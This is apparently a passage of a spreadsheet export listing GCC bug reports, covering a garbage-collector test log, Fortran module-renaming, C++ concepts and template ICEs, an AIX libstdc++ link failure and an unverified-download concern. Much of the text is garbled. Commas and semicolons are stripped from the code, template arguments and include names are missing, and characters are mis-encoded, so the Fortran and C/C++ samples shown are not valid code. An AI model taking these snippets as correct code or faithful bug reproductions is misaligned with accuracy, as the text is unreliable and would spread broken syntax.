make AR_FLAGS= CC_FOR_BUILD= CFLAGS=-O2 -g -g -O2   CXXFLAGS=-O2 -g -g -O2   CFLAGS_FOR_BUILD= CFLAGS_FOR_TARGET= INSTALL=/sw/bin/ginstall -c INSTALL_DATA=/sw/bin/ginstall -c -m 644 INSTALL_PROGRAM=/sw/bin/ginstall -c INSTALL_SCRIPT=/sw/bin/ginstall -c LDFLAGS= LIBCFLAGS= LIBCFLAGS_FOR_TARGET= MAKE=make MAKEINFO=makeinfo --split-size=5000000   PICFLAG= PICFLAG_FOR_TARGET= SHELL=/bin/sh EXPECT= RUNTEST= RUNTESTFLAGS= exec_prefix=/opt/gcc/gcc4.3w infodir=/opt/gcc/gcc4.3w/share/info libdir=/opt/gcc/gcc4.3w/lib prefix=/opt/gcc/gcc4.3w tooldir= AR=ar AS=/opt/gcc/i686-darwin/./gcc/as CC=/opt/gcc/i686-darwin/./gcc/xgcc -B/opt/gcc/i686-darwin/./gcc/ -B/opt/gcc/gcc4.3w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.3w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/sys-include CXX=/opt/gcc/i686-darwin/./gcc/g++ -B/opt/gcc/i686-darwin/./gcc/ -nostdinc++  -L/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/src -L/opt/gcc/i686-darwin/i686-apple-darwin9/libstdc++-v3/src/.libs -B/opt/gcc/gcc4.3w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.3w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.3w/i686-apple-darwin9/sys-include LD=/opt/gcc/i686-darwin/./gcc/collect-ld LIBCFLAGS= NM=/opt/gcc/i686-darwin/./gcc/nm PICFLAG= RANLIB=ranlib -c DESTDIR= check-TESTS
Switched to incremental mode
Emulating dirty bits with mprotect/signals
Completed 3 tests
Allocated 5716564 collectable objects
Allocated 306 uncollectable objects
Allocated 3749983 atomic objects
Allocated 34440 stubborn objects
Finalized 7025/7025 objects - finalization is probably ok
Total number of bytes allocated is 307097424
Final heap size is 12201984 bytes
Collector appears to work
Completed 416 collections
PASS: gctest
==================
All 1 tests passed
==================
3.842u 8.308s 0:10.32 117.6%    0+0k 0+0io 0pf+0w
with gcc 4.2.3 rev. 131933 I have to abort the test and get:
[ibook-dhum] i686-apple-darwin9/boehm-gc% time make check
Making check in include
make[1]: Nothing to be done for `check'.
make AR_FLAGS= CC_FOR_BUILD= CFLAGS=-O2 -g -O2  CXXFLAGS=-g -O2  CFLAGS_FOR_BUILD= CFLAGS_FOR_TARGET= INSTALL=/sw/bin/ginstall -c INSTALL_DATA=/sw/bin/ginstall -c -m 644 INSTALL_PROGRAM=/sw/bin/ginstall -c INSTALL_SCRIPT=/sw/bin/ginstall -c LDFLAGS= LIBCFLAGS= LIBCFLAGS_FOR_TARGET= MAKE=make MAKEINFO=makeinfo --split-size=5000000   PICFLAG= PICFLAG_FOR_TARGET= SHELL=/bin/sh EXPECT= RUNTEST= RUNTESTFLAGS= exec_prefix=/opt/gcc/gcc4.2w infodir=/opt/gcc/gcc4.2w/share/info libdir=/opt/gcc/gcc4.2w/lib prefix=/opt/gcc/gcc4.2w tooldir= AR=ar AS=/opt/gcc/i686-darwin-4.2/./gcc/as CC=/opt/gcc/i686-darwin-4.2/./gcc/xgcc -B/opt/gcc/i686-darwin-4.2/./gcc/ -B/opt/gcc/gcc4.2w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.2w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.2w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.2w/i686-apple-darwin9/sys-include CXX=/opt/gcc/i686-darwin-4.2/./gcc/g++ -B/opt/gcc/i686-darwin-4.2/./gcc/ -nostdinc++  -L/opt/gcc/i686-darwin-4.2/i686-apple-darwin9/libstdc++-v3/src -L/opt/gcc/i686-darwin-4.2/i686-apple-darwin9/libstdc++-v3/src/.libs -B/opt/gcc/gcc4.2w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.2w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.2w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.2w/i686-apple-darwin9/sys-include LD=ld LIBCFLAGS= NM= PICFLAG= RANLIB=ranlib -c DESTDIR= check-TESTS
Switched to incremental mode
Emulating dirty bits with mprotect/signals
^Cmake[2]: *** [check-TESTS] Interrupt
make[1]: *** [check-am] Interrupt
make: *** [check-recursive] Interrupt
0.035u 0.044s 1:52.95 0.0%      0+0k 0+1io 0pf+0w</t>
  </si>
  <si>
    <t>GCC-32634</t>
  </si>
  <si>
    <t>renamed use associated generic interface rejected</t>
  </si>
  <si>
    <t>The code below incorrectly gives the error as reported by Salvatore Filippone:
  Call foo_pwrk(prpfcdinfowork=aux)
                                       1
Error: There is no specific subroutine for the generic 'bar_pwrk' at (1)
Not only does it look correct but other compilers handle it OK.  module.c is not finding the true name symbol even though it has been created with the use name symtree. A quick inspection of the .mod file reveals that the interface is given the true name which simply is not findable by read_module.
Paul
module foo_base_mod
  type foo_dmt
    real(kind(1.d0)) allocatable  :: rv(:)
    integer allocatable :: iv1(:) iv2(:)
  end type foo_dmt
  type foo_zmt
    complex(kind(1.d0)) allocatable  :: rv(:)
    integer allocatable  :: iv1(:) iv2(:)
  end type foo_zmt
  type foo_cdt
     integer allocatable :: md(:)
     integer allocatable :: hi(:) ei(:)
  end type foo_cdt
end module foo_base_mod
module bar_prt
  use foo_base_mod only : foo_dmt foo_zmt foo_cdt
  type bar_dbprt
    type(foo_dmt) allocatable :: av(:) 
    real(kind(1.d0)) allocatable      :: d(:)  
    type(foo_cdt)                :: cd 
  end type bar_dbprt
  type bar_dprt
    type(bar_dbprt) allocatable  :: bpv(:) 
  end type bar_dprt
  type bar_zbprt
    type(foo_zmt) allocatable :: av(:) 
    complex(kind(1.d0)) allocatable   :: d(:)  
    type(foo_cdt)                :: cd 
  end type bar_zbprt
  type bar_zprt
    type(bar_zbprt) allocatable  :: bpv(:) 
  end type bar_zprt
end module bar_prt
module bar_pr_mod
  use bar_prt
  interface bar_pwrk
    subroutine bar_dppwrk(prxycdinfotranswork)
      use foo_base_mod
      use bar_prt
      type(foo_cdt)intent(in)    :: cd
      type(bar_dprt) intent(in)  :: pr
      real(kind(0.d0))intent(inout)    :: x(:) y(:)
      integer intent(out)              :: info
      character(len=1) optional        :: trans
      real(kind(0.d0))intent(inout) optional target :: work(:)
    end subroutine bar_dppwrk
    subroutine bar_zppwrk(prxycdinfotranswork)
      use foo_base_mod
      use bar_prt
      type(foo_cdt)intent(in)    :: cd
      type(bar_zprt) intent(in)  :: pr
      complex(kind(0.d0))intent(inout) :: x(:) y(:)
      integer intent(out)              :: info
      character(len=1) optional        :: trans
      complex(kind(0.d0))intent(inout) optional target :: work(:)
    end subroutine bar_zppwrk
  end interface
end module bar_pr_mod
module foo_pr_mod
  use bar_prt &amp;
       &amp; foo_dbprt  =&gt; bar_dbprt&amp;
       &amp; foo_zbprt  =&gt; bar_zbprt&amp;
       &amp; foo_dprt   =&gt; bar_dprt&amp;
       &amp; foo_zprt   =&gt; bar_zprt 
  use bar_pr_mod &amp;
       &amp; foo_pwrk  =&gt; bar_pwrk
end module foo_pr_mod
Subroutine foo_sub(aprbxepscdinfo)
  use foo_base_mod
  use foo_pr_mod
  Implicit None
!!$  parameters 
  Type(foo_dmt) Intent(in)  :: a
  Type(foo_dprt) Intent(in)   :: pr 
  Type(foo_cdt) Intent(in)    :: cd
  Real(Kind(1.d0)) Intent(in)       :: b(:)
  Real(Kind(1.d0)) Intent(inout)    :: x(:)
  Real(Kind(1.d0)) Intent(in)       :: eps
  integer intent(out)               :: info
!!$   Local data
  Real(Kind(1.d0)) allocatable target   :: aux(:)wwrk(::)
  Real(Kind(1.d0)) allocatable   :: p(:) f(:)
  info = 0
  Call foo_pwrk(prpfcdinfowork=aux)
  return
End Subroutine foo_sub</t>
  </si>
  <si>
    <t>GCC-2073</t>
  </si>
  <si>
    <t>cannot configure the fortran compiler on my platform</t>
  </si>
  <si>
    <t>I have been trying to run the configure program in order to build the fortran compiler but I keep getting the message that my configuration is not supported. I have tried a few variations on the configuration mostly centered around
/configure --host-powerpc-lynxos
but I keep getting the same message at the end of the configure session. Is there any way I can get the configure program (and then the 'make bootstrap) to run on a platform that is not specifically supported?
Release:
gcc-2.95.2
Environment:
LynxOS running on a Cetia VMPC6c-DUAL PowerPC board</t>
  </si>
  <si>
    <t>tacondarcure</t>
  </si>
  <si>
    <t>GCC-10256</t>
  </si>
  <si>
    <t>gcc-3.2.2 can't build it's libjava</t>
  </si>
  <si>
    <t>When building the integrated libjava gcc-3.2.2 barfes.
/var/tmp/gcc-3.2.2/BUILD/gcc/gcj -B/var/tmp/gcc-3.2.2/BUILD/athlon-linux/libjava/ \
 -B/var/tmp/gcc-3.2.2/BUILD/gcc/ --encoding=UTF-8 -C -g -classpath '' \
 -bootclasspath /var/tmp/gcc-3.2.2/BUILD/athlon-linux/libjava:../../../libjava \
 -d /var/tmp/gcc-3.2.2/BUILD/athlon-linux/libjava \
../../../libjava/java/text/DecimalFormat.java
../../../libjava/java/text/DecimalFormat.java: In class `java.text.DecimalFormat':
../../../libjava/java/text/DecimalFormat.java: In method `java.text.DecimalFormat.equals(java.lang.Object)':
../../../libjava/java/text/DecimalFormat.java:397: internal error in generate_bytecode_insn - tree code not implemented: bit_field_ref
../../../libjava/java/text/DecimalFormat.java:397: internal error in generate_bytecode_insn - tree code not implemented: bit_field_ref
../../../libjava/java/text/DecimalFormat.java:397: confused by earlier errors bailing out
Release:
gcc version 3.2.2
Environment:
	System: Linux
	Architecture: i386
	Machine: i686
host: athon-linux
build: athon-linux
target: athon-linux
configured with: ../configure --prefix=/opt/gcc-3.2.2 --disable-nls
 --enable-objc-gc --enable-shared --enable-threads --disable-multilib
 --disable-checking --with-gnu-ld --with-gnu-as --disable-c-mbchar athlon-linux
 Thread model: posix</t>
  </si>
  <si>
    <t>GCC-11871</t>
  </si>
  <si>
    <t>[3.4 Regression] Koenig lookup regression</t>
  </si>
  <si>
    <t>Since recently (&lt;3 days) this testcase segfaults mainline:
$ g++ -v -Wall -W -c kplayobjectfactory.cc 
Reading specs from /opt/gcc/lib/gcc/i686-pc-linux-gnu/3.4/specs
Configured with: ../configure --prefix=/opt/gcc --enable-c99 --enable-long-long
--enable-shared --enable-threads --enable-languages=cc++
Thread model: posix
gcc version 3.4 20030809 (experimental)
kplayobjectfactory.cc: In function `int main()':
kplayobjectfactory.cc:21: warning: unused variable 'result'
kplayobjectfactory.cc:21: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
attaching testcase in a minute</t>
  </si>
  <si>
    <t>GCC-13217</t>
  </si>
  <si>
    <t>basic_filebuf::underflow doesn't deal gracefully with read errors</t>
  </si>
  <si>
    <t>In the always_noconv case if _M_file.xsgetn returns -1 the situations is pretty
good but the exception raised has a misleading what of invalid byte sequence in
file. In the general case the read error condition is not dealt with properly 
and no meaningful exception is raised everything can happen at run time...</t>
  </si>
  <si>
    <t>GCC-55285</t>
  </si>
  <si>
    <t>Botan regression on ia-64 at Mar-2012</t>
  </si>
  <si>
    <t>http://gcc.opensuse.org/c++bench-terbium/botan/botan-summary.txt-1-0.html
shows big regression starting at 2012-03-27
120327.00779 305.24 122247 3599672 73.92 66.60 59.75 48.67 34.98 37.77 27.62 18.96 11.60 29.81 12.71 30.92 45.21 5.05 17.62 39.46 13.04 39.48 31.94 26.33 26.60 44.17 21.35 25.46 84.52 29.83 61.67 29.81 40.88 41.00 35.67 21.19 11.50 5.79 2.94 62.12 40.88 19.23 68.35 122.40 143.46 1097.96 245.17 242.69 90.38 119.04 4.34 165.42 121.75 114.69 68.42 65.40 51.00 109.29 109.04 72.23 56.15 45.92 65.38 23.77 0.75 0.37 
120327.66131 397.96 130439 4987752 42.15 39.60 37.21 33.81 27.98 32.10 17.83 13.42 7.35 24.96 11.75 25.85 25.29 3.06 16.35 31.48 10.52 31.56 26.54 24.27 20.62 38.62 18.81 19.79 45.44 25.04 48.00 24.98 28.71 28.77 25.58 13.17 6.73 3.29 1.65 36.67 27.90 13.71 24.90 55.40 67.98 1097.29 245.29 242.83 64.12 85.94 1.55 129.31 101.46 95.79 63.88 37.83 33.19 111.29 110.35 68.75 55.50 33.62 37.85 17.12 0.53 0.26 
Patches approximately in this range include:
2012-03-27  Aurelien Buhrig  
        PR middle-end/51893
        * expmed.c (store_bit_field_1): Fix wordnum value for big-endian
        targets.
2012-03-27  Martin Jambor  
        PR middle-end/52693
        * tree-sra.c (sra_modify_assign): Do not call
        load_assign_lhs_subreplacements when working with an unscalarizable
        region.
2012-03-27  H.J. Lu  
        * opth-gen.awk: Allocated a bit for Mask and InverseMask if it
        hasn't been allocated.  Define a target macro for Mask and
        InverseMask if it hasn't been defined.  Remove MaskExists handling.
        * doc/options.texi: Remove MaskExists.
2012-03-27  Richard Guenther  
        PR middle-end/52720
        * fold-const.c (try_move_mult_to_index): Handle &amp;x.array more
        explicitely.
2012-03-27  Eric Botcazou  
        * expmed.c (store_bit_field): Assert that BITREGION_START is a multiple
        of a unit before computing the offset in units.
        * expr.c (get_bit_range): Return the null range if the enclosing record
        is part of a larger bit field.
2012-03-27  Tristan Gingold  
        * config/ia64/vms.h (CASE_VECTOR_MODE): Define.
        * config/ia64/ia64.md: Remove mode in template.
        Sign extend operand in expand_simple_binop.
        * config/ia64/ia64.h (ASM_OUTPUT_ADDR_DIFF_ELT): Use
        CASE_VECTOR_MODE instead of TARGET_ILP32.
        (ADDR_VEC_ALIGN): Make it depends on CASE_VECTOR_MODE.
2012-03-26  Steven Bosscher  
        * varasm.c (assemble_external): #if 0 out the new assert from the
        previous commit it breaks the Java and Go front ends.
2012-03-26  Steven Bosscher  
        * toplev.c (check_global_declaration_1): Do not call assemble_external.
        * expr.c (emit_block_move_libcall_fn): Likewise.
        (clear_storage_libcall_fn): Likewise.
        (expand_expr_addr_expr_1): Likewise.
        (expand_expr_real_1): Likewise.
        * calls.c (rtx_for_function_call): Likewise.
        * varasm.c (assemble_external): Assert this function is only called
        during or after expanding to RTL.
2012-03-26  Martin Jambor  
        PR tree-optimization/50052
        * tree-sra.c (tree_non_aligned_mem_p): Removed.
        (tree_non_aligned_mem_for_access_p): Likewise.
        (build_accesses_from_assign): Removed strict alignment requirements
        checks.
        (access_precludes_ipa_sra_p): Likewise.
2012-03-26  Richard Guenther  
        PR tree-optimization/52701
        * tree-vect-loop.c (vect_analyze_scalar_cycles_1): Always
        compute and set the evolution part of PHI nodes.
2012-03-26  Richard Guenther  
        PR tree-optimization/52721
        * tree-vect-stmts.c (vect_init_vector): Handle scalars.
2012-03-26  Ulrich Weigand  
        PR tree-optimization/52686
        * tree-vect-data-refs.c (vect_get_smallest_scalar_type): Handle
        WIDEN_LSHIFT_EXPR.
2012-03-26  Tristan Gingold  
        * config/alpha/vms.h (LINK_SPEC): Simplify.
        (STARTFILE_SPEC): Remove -mvms-return-codes handling.
        (STARTFILE_SPEC): Remove -mvms-return-codes handling.
        (NAME__MAIN SYMBOL__MAIN): Remove.
        (VMS_DEBUG_MAIN_POINTER): Remove.
        * config/ia64/vms.h: Likewise.
        * config/alpha/alpha.c (alpha_start_function): Move vms_debug_main
        code to vms.c.  Call vms_start_function.
        * config/ia64/ia64.c (ia64_start_function): Likewise.
        * config/vms/vms-protos.h (vms_start_function): Declare.
        * config/vms/vms.c (vms_start_function): New function.
        * config/vms/vms.h (MATH_LIBRARY): Define.
        (VMS_DEBUG_MAIN_POINTER): Define.</t>
  </si>
  <si>
    <t>GCC-67018</t>
  </si>
  <si>
    <t>[c++-concepts] Failure to partially order function templates by constraints</t>
  </si>
  <si>
    <t>Created attachment 36058
Preprocessed test case
Compiling this program - preprocessed test case attached - with r226205:
#include 
template
constexpr bool f() { return false } // Line 4
template
constexpr bool f() { return true }  // Line 6
int main() {
  static_assert(f())          // Line 9
}
results in the error:
~/concept-gcc/bin/g++ -std=gnu++1z -I ~/cmcstl2/include -I ~/cmcstl2/meta/include simplefoo.cpp -c
simplefoo.cpp: In function â€˜int main()â€™:
simplefoo.cpp:9:25: error: call of overloaded â€˜f()â€™ is ambiguous
   static_assert(f())
                         ^
simplefoo.cpp:4:16: note: candidate: constexpr bool f() [with  = int*]
 constexpr bool f() { return false }
                ^
simplefoo.cpp:6:16: note: candidate: constexpr bool f() [with  = int*]
 constexpr bool f() { return true }
Given that the ForwardIterator concept directly refines InputIterator:
template 
concept bool ForwardIterator() {
  return InputIterator() &amp;&amp;
    Incrementable() &amp;&amp;
    DerivedFrom forward_iterator_tag&gt;()
}
the constraints of the ForwardIterator overload of f subsume those of the InputIterator overload and the two templates should be ordered appropriately.
In the definition of WeakInputIterator which InputIterator refines:
template 
concept bool WeakInputIterator() {
  return WeakIterator() &amp;&amp;
    Readable() &amp;&amp;
    requires (I&amp; i const I&amp; ci) {
      typename IteratorCategory
      DerivedFrom weak_input_iterator_tag&gt;()
      requires Readable()
      requires Same ValueType&gt;()
      { *ci } -&gt; const ValueType
    }
}
template 
concept bool InputIterator() {
  return WeakInputIterator() &amp;&amp;
    Iterator() &amp;&amp;
    DerivedFrom input_iterator_tag&gt;()
}
commenting out the line
  requires Readable()
makes the test compile and behave as expected.</t>
  </si>
  <si>
    <t>GCC-7613</t>
  </si>
  <si>
    <t>Can't with two child packages each of which is a renaming of the same package.</t>
  </si>
  <si>
    <t>Can't with two child packages each of which is a renaming of the same package.
tiamat[16]$ gnatgcc -c both.adb
mine-calendar.ads:3:01: X conflicts with declaration at yours-calendar.ads:3
compilation abandoned
This may be a user error (though the Aonix compiler accepts it) but even if it is the error message is peculiar.
Release:
gcc version 3.1
Environment:
Reading specs from /opt/gcc-3.1/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc-3.1/configure --prefix=/opt/gcc-3.1 --enable-languages=cc++gcovada
Thread model: single
How-To-Repeat:
Perform the compilation.</t>
  </si>
  <si>
    <t>GCC-17447</t>
  </si>
  <si>
    <t>Undetected incomplete types in parameters in templates</t>
  </si>
  <si>
    <t>struct B
template struct A {
    friend
    A }
    }
int main() {
    return 0 }</t>
  </si>
  <si>
    <t>GCC-43560</t>
  </si>
  <si>
    <t>[4.3 Regression] possible wrong code bug</t>
  </si>
  <si>
    <t>I don't believe the program below should crash when run.
Valgrind says the store at line 20 is at fault which is strange since it looks like the if branch should execute twice and the else branch 0 times.
regehr@john-home:~$ current-gcc -O small.c -o small
regehr@john-home:~$ ./small
Segmentation fault
regehr@john-home:~$ cat small.c
#include 
int g_6[1][2] = {{11}}
int g_34 = 0
int *const g_82 = 
int *g_85[2][1] = {{
void func_4 (void)
{
  int i
  for (i = 0 i &lt;= 1 i++) {
    if (g_6[0][1]) {
      *g_82 = 1
    } else {
      int **l_109 = 
      if (&amp;g_82 != l_109) {
      } else {
	*l_109 = 
      }
      *g_82 = 1
    }
  }
}
int main (void)
{
  func_4()
  return 0
} 
regehr@john-home:~$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/home/regehr/z/compiler-install/gcc-r157783-install/libexec/gcc/i686-pc-linux-gnu/4.5.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r157783-install --program-prefix=r157783- --enable-languages=cc++
Thread model: posix
gcc version 4.5.0 20100328 (experimental) (GCC)</t>
  </si>
  <si>
    <t>GCC-33837</t>
  </si>
  <si>
    <t>[4.3 regression] ICE with invalid use of decltype</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE on mainline:
===============================
void foo()
{
  __decltype A::foo()
}
===============================
bug.cc: In function 'void foo()':
bug.cc:3: error: 'A' was not declared in this scope
bug.cc:3: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in build_reference_type_for_mode at tree.c:5463
Please submit a full bug report [etc.]
The problem appeared between 2007-07-16 and 2007-08-15 presumably with
the introduction of decltype:
2007-07-27  Douglas Gregor  
	* typeck.c (structural_comptypes): Compare DECLTYPE_TYPE nodes.
	* cp-tree.def (DECLTYPE_TYPE): New.
	* error.c (dump_type): Dump DECLTYPE_TYPE nodes.
        ...</t>
  </si>
  <si>
    <t>GCC-47086</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE: verify_flow_info failed: BB 3 can not throw but has an EH edge with -O -fexceptions -fnon-call-exceptions -ftrapv</t>
  </si>
  <si>
    <t>Created attachment 22860
reduced testcase (from gcc.c-torture/execute/pr43220.c)
Compiler output:
$ gcc -O -fexceptions -fnon-call-exceptions -ftrapv pr47086.c 
pr47086.c: In function 'foo':
pr47086.c:2:1: error: BB 3 can not throw but has an EH edge
pr47086.c:2:1: internal compiler error: verify_flow_info failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r168296 - crash
I don't know if this is a regression or not.</t>
  </si>
  <si>
    <t>GCC-61439</t>
  </si>
  <si>
    <t>contrib/download_prerequisites script does not verify integrity of packages</t>
  </si>
  <si>
    <t>The InstallingGCC page on the wiki recommends the use of the contrib/download_prerequisites script for fetching gcc's dependencies.  However the script fails to check the integrity of the downloaded files.  Since it downloads specific versions of packages perhaps it would be best to check against the known hash of each tarball.</t>
  </si>
  <si>
    <t>GCC-51893</t>
  </si>
  <si>
    <t>Wrong subword index computation in store_bit_field_1 on BIG_ENDIAN targets</t>
  </si>
  <si>
    <t>Created attachment 26369
Patch
The subword index (wordnum) passed to operand_subword_force in store_bit_field_1 is incorrect for BIG_ENDIAN targets when bitsize &gt; BITS_PER_WORD.
wordnum which is used to get the subword of value is
computed wrt the number of words needed by bitsize instead of the number of words needed by the integer mode of the field which is the mode used to compute subwords.
For instance for a 40bit field to be set by a DI reg (with HI words)
the offset of the LSWord of the DI reg should be 3 not 2 as currently
computed.
The attached patch seems to solve the issue. Tested on the C testsuite
without any regression (for my target only).
Note that this problem occurs on a private target (hardly reproducible).</t>
  </si>
  <si>
    <t>aurelien.buhrig.gcc</t>
  </si>
  <si>
    <t>GCC-40871</t>
  </si>
  <si>
    <t>g++ does not find lstdc++ on AIX</t>
  </si>
  <si>
    <t>On AIX 5.3 g++ version 4.4.0 and 4.4.1 cannot find the libstdc++ in default location. This did not occur with 4.3.x.
The problem has been already discussed on the mailing list in this thread:
http://gcc.gnu.org/ml/gcc-help/2009-06/msg00092.html
and a patch was issued. It was supposedly committed to the main branch after 4.4.0 but for some reason was not present (or did not solve the issue) in 4.4.1.
I have compiled gcc with --disable-shared and use the AIX linker ld not the GNU linker.
This is the verbose compilation output of a simple Hello World program written in C++:
Using built-in specs.
Target: powerpc-ibm-aix5.3.0.0
Configured with: /hpc/work/fernandz/gnusrc/gcc-4.4.1/configure --enable-threads --enable-languages=cc++ --prefix=/hpc/work/fernandz/gnu --enable-threads --disable-shared --enable-version-specific-runtime-libs --disable-nls --with-gmp=/hpc/work/fernandz/gnu --with-mpfr=/hpc/work/fernandz/gnu --with-ppl=/hpc/work/fernandz/gnu --with-cloog=/hpc/work/fernandz/gnu
Thread model: aix
gcc version 4.4.1 (GCC) 
COLLECT_GCC_OPTIONS='-v' '-o' 'hello'
 /hpc/work/fernandz/gnu/libexec/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/cc1plus -quiet -v -D_ALL_SOURCE hellow.cpp -quiet -dumpbase hellow.cpp -auxbase hellow -version -o /hpc/home/fernandz/User-Tmp/ccrprayy.s
ignoring nonexistent directory /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/../../../../powerpc-ibm-aix5.3.0.0/include
#include ... search starts here:
#include  search starts here:
 /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/include/c++
 /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/include/c++/powerpc-ibm-aix5.3.0.0
 /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/include/c++/backward
 /usr/local/include
 /hpc/work/fernandz/gnu/include
 /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/include
 /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/include-fixed
 /usr/include
End of search list.
GNU C++ (GCC) version 4.4.1 (powerpc-ibm-aix5.3.0.0)
        compiled by GNU C version 4.4.1 GMP version 4.3.1 MPFR version 2.4.1-p5.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: f579180f2de70dc0754151f494907fb7
COLLECT_GCC_OPTIONS='-v' '-o' 'hello'
 as -u -mppc -o /hpc/home/fernandz/User-Tmp/ccwslsmj.o /hpc/home/fernandz/User-Tmp/ccrprayy.s
COMPILER_PATH=/hpc/work/fernandz/gnu/libexec/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/:/hpc/work/fernandz/gnu/libexec/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/:/hpc/work/fernandz/gnu/libexec/gcc/powerpc-ibm-aix5.3.0.0/:/hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/:/hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/
LIBRARY_PATH=/hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/:/hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-v' '-o' 'hello'
 /hpc/work/fernandz/gnu/libexec/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/collect2 -bpT:0x10000000 -bpD:0x20000000 -btextro -bnodelcsect -o hello /lib/crt0.o -L/hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1 -L/hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/../../.. /hpc/home/fernandz/User-Tmp/ccwslsmj.o -lstdc++ -lsupc++ -lm /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/libgcc.a -lc /hpc/work/fernandz/gnu/lib/gcc/powerpc-ibm-aix5.3.0.0/4.4.1/libgcc.a
collect2: library libstdc++ -lsupc++ not found</t>
  </si>
  <si>
    <t>efernandez</t>
  </si>
  <si>
    <t>GCC-13744</t>
  </si>
  <si>
    <t>ICE when using implicit copy constructor for struct defined in template function</t>
  </si>
  <si>
    <t>The following code fails with an ICE (errors are transcribed below).  I haven't
found any structural changes I can make to this code without making the problem
go away so I can't be sure what combination of constructs causes the problem
but it's clear that this only happens when using the implicit copy constructor
for a type defined within a template function (or member function of a template
class) which derives from a base type with virtual functions supplied in the
newly defined type:
struct Base {                                                                       
        virtual Base *copy(void) = 0                                               
        virtual ~Base() { }                                                         
}  
    template 
void make(void) {                                                                   
        struct Test : public Base {                                                 
                Base *copy(void) {                                                  
                        return new Test(*this)                                     
                }                                                                   
        }                                                                          
        new Test()                                                                 
}                                                                                   
int main(void) {                                                                    
        make()                                                             
        return 0                                                                   
}
compiling this with 'c++ main.cpp' gives the following errors:
main.cpp: In member function `Base* make()::Test::copy() [with T = double]':
main.cpp:13:   instantiated from here
main.cpp:10: Internal compiler error in find_function_data at function.c:310
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
thom@rudicles functor $ 
Also known to fail on gcc-3.2.3</t>
  </si>
  <si>
    <t>thomharp</t>
  </si>
  <si>
    <t>GCC-77762</t>
  </si>
  <si>
    <t>Incorrect destination buffer length in -Wformat-length warning</t>
  </si>
  <si>
    <t>Created attachment 39703
dbg_log.c
The attached test case extracted from nscd/dbg_log.c in glibc prints (when compiled with -O2 -Wall):
dbg_log.c: In function â€˜dbg_logâ€™:
dbg_log.c:11:10: warning: specified size 512 exceeds the size 1 of the destination object [-Wformat-length=]
   return __builtin___vsnprintf_chk (__s __n __USE_FORTIFY_LEVEL - 1
          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                     __bos (__s) __fmt __ap)
                                     ~~~~~~~~~~~~~~~~~~~~~~~~~
This appears to be different from bug 77743 because GCC should not have buffer length information in this case.</t>
  </si>
  <si>
    <t>GCC-21</t>
  </si>
  <si>
    <t>Bug in function template specialization?</t>
  </si>
  <si>
    <t>I found what seems to be a bug in parsing function template
specializations.  In the test case I have an example of two function
template specializations one that declares an ordinary function and one
that declares an overloaded operator.  GCC produces an error for the
operator but does not for the ordinary function.
Release:
2.95
Environment:
System:  Linux x86
OS:  Redhat 6.0
gcc version:  2.95.2  (I installed the rpms from redhat's rawhide site.)
How-To-Repeat:
Command-line:  gcc bug1.cpp</t>
  </si>
  <si>
    <t>GCC-28651</t>
  </si>
  <si>
    <t>[4.0 Regression] signed compare incorrectly false for (int)(U+4)&lt;(int)U where U is unsigned INT_MAX (for optimized  x86)</t>
  </si>
  <si>
    <t>This happens with 4.1.1 release too but not with gcc-4.2-20060805. Also happens for gcc 4.1.1 on i386 Solaris 10.
bash-3.00$ uname -a
Linux bonk.sics.se 2.6.16-1.2111_FC4smp #1 SMP Sat May 20 20:16:24 EDT 2006 i686 unknown unknown GNU/Linux
bash-3.00$ cat bug.c
#include 
#include 
int main(int argc char *argv[])
{
  unsigned u
  /* u = INT_MAX but gcc cannot know that */
